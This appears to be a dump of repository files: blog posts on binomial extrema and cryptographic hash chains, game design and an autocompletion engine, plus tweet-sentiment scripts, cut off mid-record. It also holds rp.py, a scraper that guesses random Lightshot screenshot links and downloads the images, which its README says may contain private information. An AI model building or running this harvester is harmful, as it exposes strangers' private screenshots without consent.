src='../assets/mean-range-of-a-bell-curve-distribution/convergence-speed.svg'>\n <figcaption>\n <p>Plot of the number of iterations necessary to reach convergence,\n when computing the maximum of a sample of 2<sup>i</sup> elements\n from a Binomial 𝔅(2<sup>i</sup>, 2<sup>-2i</sup>) distribution, in blue.\n In red is log<sub>2</sub>(i),\n which matches the shape of convergence speed asymptotically.\n <p>Not shown is the number of iterations for binary search.\n It would be a straight diagonal: 2<sup>i</sup> takes i iterations.\n </figcaption>\n</figure>\n\n## 4. Balls Into Bins\n\nThis result allows exact computation of solutions for a well-known problem:\n*“Given $`N` balls each randomly placed into $`R` bins,\nhow many do the most and least filled bin have?”*\n\nThe problem is a sampling of $`N` values\nof the Binomial distribution $`\\mathcal{B}(N, \\frac{1}{R})`.\nThus, the mean maximum and minimum are its solutions.\n\nThe widget at the top of the page gives an instant and exact result\nfor this problem, for values below $`2^{1024}`.\n\n### 4.1. Hash tables\n\nOne use for this problem is in assessing the worst-case complexity\nof **hash table** operations to match operational requirements.\nIndeed, the hash output is meant to be uniformly distributed;\nin other words, a [PRF][]: one such example is [SipHash][].\n\nSince the implementation of hash collisions typically require linear probing,\nlibrary developers strive for a bounded maximum number of hashes\nthat map to the same table entry. Typically, they use a [load factor][]:\nif more than 87.5% of the table is filled,\nthe table size is doubled and rehashed.\n\nThe widget above can help show that\nthis approach does not yield a bounded maximum,\nby inputting `0.875*2^i` balls into `2^i` bins:\n\n<table>\n <tr><th> Table size <th> Max bucket size\n <tr><td> 2<sup>8</sup> <td> 4\n <tr><td> 2<sup>16</sup><td> 7\n <tr><td> 2<sup>32</sup><td> 11\n <tr><td> 2<sup>64</sup><td> 19\n</table>\n\nAs you can see, the growth is very slow,\nwhich satisfies engineering constraints.\nIf there was some imperative to be bounded below a certain value,\nthe table algorithm could use the principles laid out in this article\nto dynamically compute the load factor\nthat keeps the maximum bucket size below the imposed limit.\n\n(A notable exception to this result is [Cuckoo Hashing][],\nwhose maximum bucket size has a different formula.)\n\n### 4.2. Hash chains\n\nAnother situation where this problem finds relevance is in **cryptography**.\nFirst, in the field of collision-resistant functions.\nIn a [hash chain][], the root hash has a single hash as input.\nThe 256-bit input of the SHA-256 primitive randomly maps to its 256-bit output.\nThere will be one particular hash output that 57 distinct inputs produce.\nThe pigeonhole principle dictates that this removes possible outputs;\nand indeed, about 38% of the $`2^{256}` possible output hashes\ncannot be produced.\nIn other words, if you take a random 256-bit hex string,\nit will not be a valid output in one case out of three.\n\nIndeed, the probability that a bin has no balls\nafter the first link in the chain is\n$`\\beta_{n = 2^{b},\\,p = 2^{-b}}(0)\n= (1 - 2^{-b})^{2^{b}}\n\\xrightarrow{\\, b \\rightarrow \\infty \\,} \\frac{1}{e}`\nfor a $`b`-bit hash.\nOn the $`i`-th chain of the link, the same phenomenon strikes again,\nand only $`h_i = 1 - (1 - 2^{-b})^{2^{b}h_{i-1}}` remain\n(with $`h_0 = 1` since we start with 100%).\n\nOf course, after that initial 38% loss, the subsequent losses are lesser,\nbut $`h_i \\xrightarrow{\\, i \\rightarrow \\infty \\,} 0`.\nAfter just 100 iterations, only 2% of possible hashes remain.\nAfter the typical 10k iterations of [PBKDF2][], only 0.02% remain.\n\nIt is not a vulnerability per se:\nit only removes about 13 bits off a 256-bit space,\nor 7 bits of security against collision resistance.\nTechnically, when the number of iterations reaches $`2^{\\frac{b}{2}}`,\nthe probability formula breaks down;\na hash chain will loop around after an average of $`2^{\\frac{b}{2}}` operations.\nThis does showcase yet how simple designs can yield subtle consequences.\n\n### 4.3. Block ciphers\n\nConsider an ideal $`b`-bit block cipher (PRP) using a $`b`-bit key,\nas with [AES-128][AES].\nWe are an attacker examining a $`b`-bit ciphertext block\ngenerated from the encryption of a low-entropy plaintext block of the same size.\n\nWhile it is true that for a given key,\neach plaintext block produces a single ciphertext block and vice-versa,\nfor a given ciphertext block, each key maps to a random plaintext block.\nKeys can be seen as balls, and plaintext blocks as bins.\n\nThus, conversely, about $`\\frac{100}{e} \\approx 37\\%` of plaintext blocks\nhave zero keys that decrypt the ciphertext to them.\nThus, if the plaintext block contained a single bit of information,\nsuch as a presidential vote in a majoritarian election,\n*and if finding the number of valid keys was computationally feasible*,\nthe adversary could decrypt the vote with probability $`\\frac{1}{e}`.\n\nYet again, it is not a vulnerability,\nsince the only currently-known way to do so is to brute-force the key,\nbut it creates an unintuitive attack that a larger key would dismiss.\n\nSimilarly, in an indistinguishability under chosen-plaintext attack (IND-CPA)\nagainst an ideal $`b`-bit block cipher with a $`2b`-bit key,\nas [AES-256][AES] is assumed to be,\nthe set of possible couples of plaintext/ciphertext blocks\nhas $`2^{b+b} = 2^{2b}`, while the set of keys has $`2^{2b}`.\nSince the latter randomly map to the former,\nwhen sending two plaintexts and receiving the encryption of one of them,\nthere is no possible key that encrypts the secretly discarded plaintext\nto the provided ciphertext, with probability $`\\frac{1}{e}`.\n*Assuming again that we can simply compute whether there exists no valid key\nthat encrypts a plaintext to a ciphertext* in polynomial time,\nwe would expect to need a mere three plaintext queries before we can tell\nwhich of the two plaintexts sent every time, the first or the second,\nis the one that gets encrypted, with an advantage of 1.\n\nAlso, we can now say precisely that,\nin a know-plaintext attack (KPA) with [AES-256][AES],\n*the single known plaintext/ciphertext pair can have at most 57 valid keys*\nthat do encrypt the plaintext block to the ciphertext block, on average.\nThat is the number of balls\nin the most filled of $`2^{256}` bins receiving $`2^{256}` balls.\nHaving that many keys is unlikely however:\n58% of all valid pairs will have a single valid key, 29% will have two,\n10% will have three, and so forth.\n\nFinally, still in [AES-256][AES], for a given ciphertext block,\nthe plaintext block with the most keys decrypting to it ($`K_{max}`)\nhas about 600 quintillion more keys\nthan the plaintext block with the least keys ($`K_{min}`),\nmaking it more likely.\nThat may superficially seem like a disadvantage\nof using larger keys than the block size.\nHowever, the advantage gained compared to the least likely plaintext block\nis only an increased probability by\n$`\\frac{K_{max}-K_{min}}{2^{256}} = 2^{-187}`,\nwhich is not only extremely negligible, but also smaller than in AES-128\n($`\\frac{K_{max_{128}}-K_{min_{128}}}{2^{128}} = 2^{-123}`).\n\n## Conclusion\n\nWe described an exact formula for the mean range\nand extrema of a Normal distribution.\nWe used it to produce an algorithm\nthat can compute the extrema of any bell curve distribution,\nwith the example of the Binomial distribution.\nWe optimized that algorithm to run in $`O(\\log(\\log(m)))` average time,\nand discussed a few exact consequences that used to be unconfirmed approximations.\n\n[Har54]: https://sci-hub.se/10.1214/aoms/1177728848\n[Abd54]: https://sci-hub.se/10.1111/j.1467-9574.1954.tb00442.x\n[Gon81]: https://sci-hub.se/10.1145/322248.322254\n[PRF]: https://eprint.iacr.org/2017/652.pdf\n[SipHash]: https://www.aumasson.jp/siphash/\n[load factor]: https://github.com/rust-lang/hashbrown/blob/805b5e28ac7b12ad901aceba5ee641de50c0a3d1/src/raw/mod.rs#L206-L210\n[Cuckoo Hashing]: http://www.cs.toronto.edu/~noahfleming/CuckooHashing.pdf\n[hash chain]: https://sci-hub.se/10.1145/358790.358797\n[PBKDF2]: https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-132.pdf\n[AES]: https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.197.pdf\n\n**Bibliography:**\n\n- [Hartley, H. O., & David, H. A. (1954). Universal Bounds for Mean Range and Extreme Observation. The Annals of Mathematical Statistics, 25(1), 85–99. doi:10.1214/aoms/1177728848][Har54]\n- [Abdel-Aty, S. H. (1954). Ordered variables in discontinuous distributions. Statistica Neerlandica, 8(2), 61–82. doi:10.1111/j.1467-9574.1954.tb00442.x][Abd54]\n- [Gonnet, G. H. (1981). Expected Length of the Longest Probe Sequence in Hash Code Searching. Journal of the ACM, 28(2), 289–304. doi:10.1145/322248.322254][Gon81]\n- [Lamport, L. (1981). Password authentication with insecure communication.\n Communications of the ACM, 24(11), 770–772. doi:10.1145/358790.358797][hash\n chain]\n\n<script async src=\"../assets/mean-range-of-a-bell-curve-distribution/mp-wasm.js\"></script>\n<script async src=\"../assets/mean-range-of-a-bell-curve-distribution/normal-mean-range.js\"></script>\n<script async src=\"../assets/mean-range-of-a-bell-curve-distribution/binomial-mean-range.js\"></script>\n<script async type=module src=\"../assets/mean-range-of-a-bell-curve-distribution/cli-calculator.js\"></script>\n<script defer type=module>\nimport Calculator from '../assets/mean-range-of-a-bell-curve-distribution/cli-calculator.js';\n\nfunction initBallsIntoBins(mpWasm) {\n const calc = new Calculator(mpWasm);\n calc.mpf.setDefaultPrec(1024);\n const updateBallsIntoBins = function() {\n ballsErrors.textContent = '';\n const balls = calc.compute(ballsInput.value);\n if (balls.errors.length > 0) {\n ballsErrors.innerHTML = balls.errors.map(e => e.toString()).join('<br>');\n return;\n }\n const nballs = balls.result[0];\n ballsOutput.value = nballs.round().toString();\n\n const bins = calc.compute(binsInput.value);\n if (bins.errors.length > 0) {\n ballsErrors.innerHTML = bins.errors.map(e => e.toString()).join('<br>');\n return;\n }\n const nbins = bins.result[0];\n binsOutput.value = nbins.round().toString();\n\n const range = binomialRange(nballs, calc.mpf(1).div(nbins), nballs);\n minOutput.value = range.min.toString();\n maxOutput.value = range.max.toString();\n rangeOutput.value = range.range.toString();\n };\n ballsInput.addEventListener('input', updateBallsIntoBins);\n binsInput.addEventListener('input', updateBallsIntoBins);\n updateBallsIntoBins();\n}\n\naddEventListener('DOMContentLoaded', () => {\n fetchMPWasm('../assets/mean-range-of-a-bell-curve-distribution/mp.wasm')\n .then(mpWasm => {\n const mpf = window.mpf = mpWasm.mpf;\n initBallsIntoBins(mpWasm);\n });\n});\n</script>\n\n---\n\n[Comments on Reddit](https://www.reddit.com/r/espadrine/comments/n37wiw/mean_range_of_bell_curve_distributions/).\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2021-05-02T14:52:56Z\",\n \"keywords\": \"stats, crypto\" }\n</script>\n"
},
{
"alpha_fraction": 0.7327259182929993,
"alphanum_fraction": 0.7494305372238159,
"avg_line_length": 56.260868072509766,
"blob_id": "01e2242ca7f948989d8bea3948343b655841c514",
"content_id": "138e5ecb567088460ad8590d1f8fd0ce72149197",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1321,
"license_type": "no_license",
"max_line_length": 219,
"num_lines": 23,
"path": "/blog/src/what-i-made-on-year-2014.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# What I Made On Year 2014\n\nOpen-source-wise:\n\n- http://Shields.io (The first commit was, in fact, a year ago)\n- A syntax sheet converter [Ace → CodeMirror](https://github.com/espadrine/ace2cm)\n- [Live AsciiDoc Editor](http://espadrine.github.io/AsciiDocBox/) (side-by-side)\n- Node Canvas [SVG support](https://github.com/Automattic/node-canvas/pull/465). Write your node code with a Canvas API, get SVG back out.\n- http://TheFileTree.com passwords and program jail, although I keep those features hidden. This year, it will allow you to write LaTeX and get the PDF back from anywhere.\n- Not My Territory, a game I design: I got its rules right. Now, to finish implementing it…\n\nOtherwise, I got a diploma in engineering, got hired at https://www.capitainetrain.com, implemented comfort classes (a sub-division of travel classes for some trains), a card store page, invoices and a few other things.\n\nIt's quite fun to no longer be tied to strange decisions and absurd, chronophage school projects.\n\nI hope to do even bigger things this year, many being continuations on this year's achievements, some (hopefully) being outstanding surprises.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2015-01-03T22:51:00Z\",\n \"keywords\": \"retro\" }\n</script>\n"
},
{
"alpha_fraction": 0.7844586372375488,
"alphanum_fraction": 0.7872552871704102,
"avg_line_length": 165.86666870117188,
"blob_id": "3269579f72f864b940b4af8d44af595fb426e917",
"content_id": "2870e4182a898f64b69a41dc82ff7ef761a08e02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5006,
"license_type": "no_license",
"max_line_length": 795,
"num_lines": 30,
"path": "/blog/src/an-essay-on-ludic-wars.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# An Essay On Ludic Wars\n\nWorking on game design has made me quite receptive to the unfathomed diversity of gameplay techniques, and on their mimesis.\n\nIndeed, the mechanisms in use for simulated combat are not the monopoly of combat games. It is all abstract mathematics in the end. But the systems in use are designed to achieve that ultimate goal of games and entertainment: a player should never know who wins, up until the very last, glorious move.\n\nThe most obvious play to settle on is the **Game of Numbers**. Whoever has the highest number wins. This is in the most rudimentary game of dice, in the War card game, and to some extent in many exchangeable card games. Many games which pretend to feature complex statistical battles can easily be reduced to a Game of Numbers. Most casino games are, as well, given the illegitimacy of techniques such as card counting.\n\nThe issue is that the main driver of player interest, choice, is absent from that design, reducing it to a sandbox simulation for the player to watch. It can be fun in a look-at-an-anthill kind of way; it just isn't *that* kind of fun. Especially when the player realizes that, in the grand scheme of things, *they are the ant*.\n\nHere is another mechanism. I call it \"**Rock Paper Scissors**\". You have atomic units to which are assigned traits. Some traits give an immediate, hard-coded advantage against hand-picked others. Those traits create a mathematical oriented graph, where each vertex is a trait. Usually, the graph is set to be circularly orientated, so that it can be approximated by a [Lotka Volterra](http://en.wikipedia.org/wiki/Lotka_volterra) [simulation](http://espadrine.github.io/lotka-volterra/). It ensures that the player can't stand on one foot, that they cannot rely on the best option, because which trait is the best option alternates with time. This generates an emergent skill game where player choice is king: learn the Lotka curves, and choose which trait to assign to units to beat the odds.\n\nFind this in most strategy games, both RTS and TBS. Many exchangeable card games have that, too, let alone the famed titular game.\n\nOne last mechanism. **Move Traits**. Most successful in Chess and all its derivatives, it is designed to give different move operations to units of different traits. It is heavily seen in RTS: each unit can move on different terrain (land, sea, air) with different speeds. The realism greatly impedes on the combinatorial explosion this mechanism gives, which is too bad, since that is what creates Chess' emergent gameplay from seemingly simple rules.\n\nOf course, this is far from an exhaustive list. Go uses a completely different system, **Constriction**. Surround an enemy, remove all of the air (or a particular resource), and they die. This mechanism appears in a reminiscing way in modern RTS games, through their implementation of economy, and the resulting attrition game it generates. However, yet again, the attempt at realism destroys the potential for interesting choices: instead of a global economy, one in which you can trade a part of your territory for a more important piece. I wonder why global economies are still a thing in games. In the end, it makes the only interesting resource in those game not metal, nor gold, nor lumber, but people. All other resources are global, and therefore, generate no amount of relevant choices.\n\nAbove all, the game mechanic that I am most afraid of, and which a poor attempt at the Constriction system leads to, is **The Waiting Game**. This system is designed to make you wait for the completion of a building, or the collection of resources, or the exploration of a map. It is directly designed to both make the game realistic, which it needn't be (and never is anyway), and to give ponderation to elements of the economy. *This takes more time to make, but is more valuable!* The Waiting Game literally makes the player wait artificially for something which could be executed instantly, creating a map from a make-believe economy to something that actually holds value, the passing time.\n\nHowever, The Waiting Game interrupts suspension of the player's disbelief and forces them to multitask into chores which were not the actions they wanted to make, nor the game they wanted to play. I won't even go into the paroxysm of this, so-called free to play games that add one layer to the mapping of fake value to real value by offering to exchange wasted player time with fiat money.\n\nWhere I am heading with these thoughts is this: just like tools can work together to make a huge variety of outstanding devices and objects, these game mechanics can be combined to make a plethora of games with outstanding behaviors. Unfortunately, most games combine them in the same way, leaving much of the vector space of all possible great games unexplored.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-08-14T12:42:00Z\",\n \"keywords\": \"\" }\n</script>\n"
},
{
"alpha_fraction": 0.7833535671234131,
"alphanum_fraction": 0.7886598110198975,
"avg_line_length": 193,
"blob_id": "b50a20a838dd2464545b392f003203f60b4e1ffe",
"content_id": "69894d90dcdd4557dfa1bfc61274f859755534f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6596,
"license_type": "no_license",
"max_line_length": 1037,
"num_lines": 34,
"path": "/blog/src/aulx-the-tricks.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Aulx: The Tricks\n\nAulx is an autocompletion engine for the Web. It is ongoing work, but you can look at it [here](https://github.com/espadrine/aulx) and try it [there](http://espadrine.github.io/aulx/). Here, I am going to focus on JS autocompletion, and talk about two specific tricks I implemented.\n\n# The Contextualizer\n\nOne of the challenges of writing an autocompletion system is that we need to learn from partially written code, since it is still being edited. A common approach is to write a separate parser that is able to recover from missing parentheses, unmatched braces, any incorrect syntax. For example, Tern's Acorn parser relies on indentation to derive the correct braces. This costs some performance in the parser, and there is no \"silver bullet\" implementation, no royal algorithm that works intuitively in all cases.\n\nFalling that, I decided to do the obvious heuristic. It turns out that, in most of the code you write, newlines are significant. They mean that you are going from one procedural statement to the next. Even when they are mid-statement, your code probably is readable by a simple parser when you write the code. If your code really isn't parseable, we simply keep the latest information. Then, we keep it up-to-date when we can.\n\nHowever, given that, how would you know where the cursor is? How would you determine when to suggest what, without an abstract syntax tree? For that purpose, I create a contextualizer which only relies on a lexer. Based on the list of tokens produced, we can find the position of the cursor. Then, depending on which token precedes it, we obtain all the information we would need. We know when we have dot completion, we know all the identifiers defining the successive properties to suggest from, and so on. A remarkable advantage of this technique is that you can figure out where the cursor is (\"contextualize\") even with very improper code, and give some good suggestions nonetheless. Indeed, the lexer will succeed with any code which the error-tolerant JS parser can eat, and then some.\n\nSo, I wrote Esprima's lexer. The one, famous pain point there is that in JS, it is notably hard to discriminate the use of `/` (slash) as a division symbol and as a regular expression marker. The usual method is to rely on the parser, running on the side, for hints. That, however, means that we need to run the parser when running the lexer, which both has a performance cost, and may throw if the code isn't syntactically correct. Fortunately, Tim Disney from Mozilla [discovered](http://disnetdev.com/blog/2012/12/20/how-to-read-macros/) a way to properly lex code without the use of a parser. I implemented his algorithm in Esprima, and it is now merged upstream.\n\nThat said, the lexer has a performance cost of itself. I wanted to minimize that as much as possible. It turns out that, again, the idea that JS code has implicitly significant newlines turns out to be great. Indeed, that has an impact on the tokenizing rules. Newlines are not allowed in single-line comments, nor in regular expressions, which means that I could cut corners quite a bit. In the end, I proved that we only really need to lex the line the cursor is on, and go through a \"shortcut\" algorithm for all the code leading to that line. That shortcut only needs to keep track of string literals and multiline comments. Indeed, the productions that can include a line terminator are MultilineNotAsteriskChar, MultilineNotForwardSlashOrAsteriskChar, LineContinuation (for strings), and InputElementDiv and InputElementRegExp, those last two being only used to distinguish between the `/` for division and for regular expressions, which we are not concerned with. That makes the contextualizer remarkably fast in common situations.\n\n# Type as in Interface\n\nAnother thing I wanted to try was a design that absorbed information wherever it could. Useful data, I reasoned, is twofold. One may either wish to search for a specific property / variable name / symbol, to type it faster, or may wish to look up all properties available in an object, for exploratory purposes. Never underestimate the power of exploratory programming. There's always something you stumble upon and that will make you go \"heh, that looks sweet!\" The other day, I noticed that Firefox had `navigator.mozSms`, on the desktop version. I looked it up, it turns out that it has been deprecated in favor of `navigator.mozMobileMessage`. And boom, you find [this spec draft](http://www.w3.org/2012/sysapps/messaging/) dealing with mobile messaging, with editors from Telefonica and Intel. Fumbling through APIs with your eyes wide open can give you accidental ideas, and refresh your memory. Hey, I had forgotten about `navigator.onLine`!\n\nAs a language tool, you can either be very strict about types, and require a lot of written type information from the developer with the implicit promise that this strictness will bring her more tooling information, or you can eat every piece of information you find lying on the floor, and use that. Aulx' approach is the hoover one.\n\nOf course, no matter what approach you take, you need to organize the information you aggregate, and for that purpose, in JS, you benefit from having some concept of types. In my case, I gather data from every function call, from every assignment, from every property access. Therefore, I have defined my types as being the *union of all information related to functions*. If a variable was used as a second parameter to a function, that is stored in that variable's type. If we learned that it is an instance of some constructor, that too is stored. Then, on the other side of the fence, each function accumulates information about properties hold by each of their parameter, by their return value, and by their instances (if it is a constructor). That way, when completing properties, all this information is combined to draw the largest and most accurate picture we can.\n\n# Not just JS\n\nAulx is meant for the Web, not just JS. That was the goal from the start. It now has a world-class CSS autocompletion system, which Girish Sharma of [Firefox fame](https://hacks.mozilla.org/2013/08/new-features-of-firefox-developer-tools-episode-25/) contributed. Expect work on HTML autocompletion too. Imagine receiving autocompletion even for inlined JS and CSS! Imagine combining that information so as to provide some DOM / CSS information in your JS!\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2013-08-20T19:41:00Z\",\n \"keywords\": \"js\" }\n</script>\n"
}
] | 59 |
miltinhoc/RP-Python | https://github.com/miltinhoc/RP-Python | e325b5d883510ceadb446cd1bd35bed1df7103d0 | 487c7b5d3f15f950a9a69ac7043cb6c76e2a2d6c | a82cdfcc7ba4313b4c58478c47c71afdad54f379 | refs/heads/master | 2020-04-15T15:58:27.336927 | 2019-01-09T23:48:46 | 2019-01-09T23:48:46 | 164,813,512 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6507720351219177,
"alphanum_fraction": 0.6816530227661133,
"avg_line_length": 32.378787994384766,
"blob_id": "0cdb0055213df69b13f86e0698ee6e58e01c0d32",
"content_id": "18fb23d63e8239a5ec5064e5c0228fc9361cdf3e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2202,
"license_type": "permissive",
"max_line_length": 162,
"num_lines": 66,
"path": "/rp.py",
"repo_name": "miltinhoc/RP-Python",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\n\"\"\"\nGenerates random links based on a prefix.\nusage: ./rp.py -p <f3> -r 200 \n\"\"\"\n\nimport urllib2\nfrom urllib2 import Request\nimport re\nimport time\nimport signal\nimport sys\nimport os\nimport random\nimport string\nimport urlparse\nimport argparse\nfrom msvcrt import putch, getch\n\n# Detects Ctrl+C command\ndef signal_handler(signal, frame):\n\tprint('[*] Ctrl+C detected! Aborting...')\n\tsys.exit(0)\n\n# Creates random url\ndef randomstring(pref):\n\treturn 'http://prnt.sc/' + pref + ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(4))\n\n# Creates folder to save images\nif not os.path.isdir('images-light'):\n os.makedirs('images-light')\n \ndef main():\n\tparser = argparse.ArgumentParser(description=\"Get random images from lightshot\", prog=\"rp\")\n\tparser.add_argument(\"-p\", dest=\"prefix\", help=\"Prefix to use\", required=True)\n\tparser.add_argument(\"-r\", dest=\"results\", help=\"Max number of results\", required=True, type=int)\n\toptions = parser.parse_args()\n\tprint \"[*] Finding Images...\"\n\ta = range(0, options.results)\n\tfor i in a:\n\t\tsignal.signal(signal.SIGINT, signal_handler)\n\t\tlink = randomstring(options.prefix)\n\t\tfile_name= link.split(\"/\")[-1]\n\t\topener = urllib2.build_opener()\n\t\topener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')]\n\t\tresponse = opener.open(link)\n\t\thtml = response.read()\n\t\ttime.sleep( 1 )\n\t\tm = re.search(r\"<meta property=\\\"og:image\\\" content=\\\"(.+).png\\\"/>\", html)\n\t\tprint('[*] Trying id: ' + link)\n\t\tif m:\n\t\t\ttry:\n\t\t\t\tfinal_link = m.group(1) + '.png'\n\t\t\t\topener_file = urllib2.build_opener()\n\t\t\t\topener_file.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')]\n\t\t\t\tresponse_file = opener_file.open(final_link)\n\t\t\t\twith open('images-light\\\\' + file_name + '.png', 'wb') as output:\n\t\t\t\t\toutput.write(response_file.read())\n\t\t\t\tprint('\tFound image with id ' + file_name)\n\t\t\texcept ValueError:\n\t\t\t\tprint('\tError downloading image with id ' + file_name)\t\t\n\t\telse:\n\t\t\tprint('\tNo image with id ' + file_name)\t\n\tprint(\"[*] Download complete!\")\nmain()"
},
{
"alpha_fraction": 0.7123894095420837,
"alphanum_fraction": 0.721238911151886,
"avg_line_length": 34.68421173095703,
"blob_id": "384335df8e6a1eb360b9be97317ff845f34dc56d",
"content_id": "986ece640ae84110d1c614fbeea753122c7f068e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 678,
"license_type": "permissive",
"max_line_length": 199,
"num_lines": 19,
"path": "/README.md",
"repo_name": "miltinhoc/RP-Python",
"src_encoding": "UTF-8",
"text": "# RP-Python\nFinds photos uploaded by people to a specific Host. This is an simpler and open-source version of [RP](https://github.com/miltinhoc/RP)\n\n## Usage example:\n```\nrp.py -p m3 -r 200\n```\n\n## Help\n```\narguments:\n-p PREFIX A prefix (2 characters) used to find images (example: c4)\n-r MAX_SEARCH Maximum limit of search results\n```\n\n**Prefix:** Depending on the prefix used, you may find Images that are older, newer or find none at all.\n\n## Disclaimer:\nThe pictures found by the program may have content of adult nature or contain private information. I am not responsible for such pictures or the malicious use of the private information you may find.\n"
}
] | 2 |
AmitPoonia/tweet-sentiments | https://github.com/AmitPoonia/tweet-sentiments | b8afe9ee8bc32db020069a4bd5b07a4592d516ce | dd73405ce16569eeaa2e04db4a4915ba61142513 | ebffc69dcd34f59e08b53b64abcc12068128b298 | refs/heads/master | 2022-09-28T19:44:50.706842 | 2015-12-04T16:38:14 | 2015-12-04T16:38:14 | 47,397,252 | 0 | 0 | null | 2015-12-04T10:24:18 | 2015-12-04T10:31:00 | 2022-09-23T20:44:55 | Python | [
{
"alpha_fraction": 0.7096273303031921,
"alphanum_fraction": 0.7298136353492737,
"avg_line_length": 31.200000762939453,
"blob_id": "970e545ec5963c2755e7f0cbe6b0dc094f570688",
"content_id": "21e172fa52a4b57f8d189c8bbf5bc76e2ca50495",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 644,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 20,
"path": "/joint_sentiments.py",
"repo_name": "AmitPoonia/tweet-sentiments",
"src_encoding": "UTF-8",
"text": "from __future__ import division\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import classification_report\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import scale\n\n\nX_w2v = np.load('models/X_all_w2v')\nX_lsa = np.load('models/X_all_lsa')\ny = np.load('models/y_all_w2v')\n\nX = np.hstack((X_w2v,X_lsa))\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=42)\n\nlogit = LogisticRegression(C=0.5)\nclf = logit.fit(X_train, y_train)\npred = clf.predict(X_test)\nprint classification_report(y_test, pred, target_names=['1.','0.','-1.'])\n"
},
{
"alpha_fraction": 0.6486919522285461,
"alphanum_fraction": 0.6620395183563232,
"avg_line_length": 26.955223083496094,
"blob_id": "559c02798ccea80379df453533ed1825aa539a00",
"content_id": "2c6aa82c96b587192b1407462e86a338db68f89d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1873,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 67,
"path": "/word2vec_sentiments.py",
"repo_name": "AmitPoonia/tweet-sentiments",
"src_encoding": "UTF-8",
"text": "from __future__ import division\nimport sys\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import classification_report\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import scale\n\nsys.path.append('models/word2vec_twitter_model')\nfrom word2vecReader import Word2Vec\n\nmodel_path = 'models/word2vec_twitter_model/word2vec_twitter_model.bin'\n\nprint 'Loading the model...'\nmodel = Word2Vec.load_word2vec_format(model_path, binary=True)\n\ndef preprocess(text):\n special_chars = \"\"\".,?!:;(){}[]#\"\"\"\n for c in special_chars:\n text = text.replace(c, ' %s '%c)\n words = text.lower().split()\n\n return words\n\ndef get_vector(text, model=model, size=400):\n words = preprocess(text)\n vec = np.zeros(size)\n count = 0.\n for word in words:\n try:\n vec += model[word]\n count += 1.\n except KeyError:\n continue\n if count != 0:\n vec /= count\n return vec\n\nX_pos = open('data/positive-all','r').readlines()\nX_neu = open('data/neutral-all','r').readlines()\nX_neg = open('data/negative-all','r').readlines()\n\n\nX_pos_vec = np.array(map(get_vector, X_pos))\nX_neu_vec = np.array(map(get_vector, X_neu))\nX_neg_vec = np.array(map(get_vector, X_neg))\n\n\ny_pos_vec = np.ones(len(X_pos_vec))\ny_neu_vec = np.zeros(len(X_neu_vec))\ny_neg_vec = np.full(len(X_neg_vec),-1)\n\nX_all = np.concatenate((X_pos_vec, X_neu_vec, X_neg_vec))\ny_all = np.concatenate((y_pos_vec, y_neu_vec, y_neg_vec))\n\nX_all = scale(X_all)\n\nX_all.dump('models/X_all_w2v')\ny_all.dump('models/y_all_w2v')\n\n\nX_train, X_test, y_train, y_test = train_test_split(X_all, y_all, test_size=0.4, random_state=42)\n\nlogit = LogisticRegression(C=0.5)\nclf = logit.fit(X_train, y_train)\npred = clf.predict(X_test)\nprint classification_report(y_test, pred, target_names=['1.','0.','-1.'])\n"
},
{
"alpha_fraction": 0.6788889169692993,
"alphanum_fraction": 0.6877777576446533,
"avg_line_length": 26.69230842590332,
"blob_id": "a10fc856786eb86cc3f40e3bfa96a980c824baa9",
"content_id": "fd2a74801173614a758ca7e941472d13f28173ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1800,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 65,
"path": "/lsa_sentiments.py",
"repo_name": "AmitPoonia/tweet-sentiments",
"src_encoding": "UTF-8",
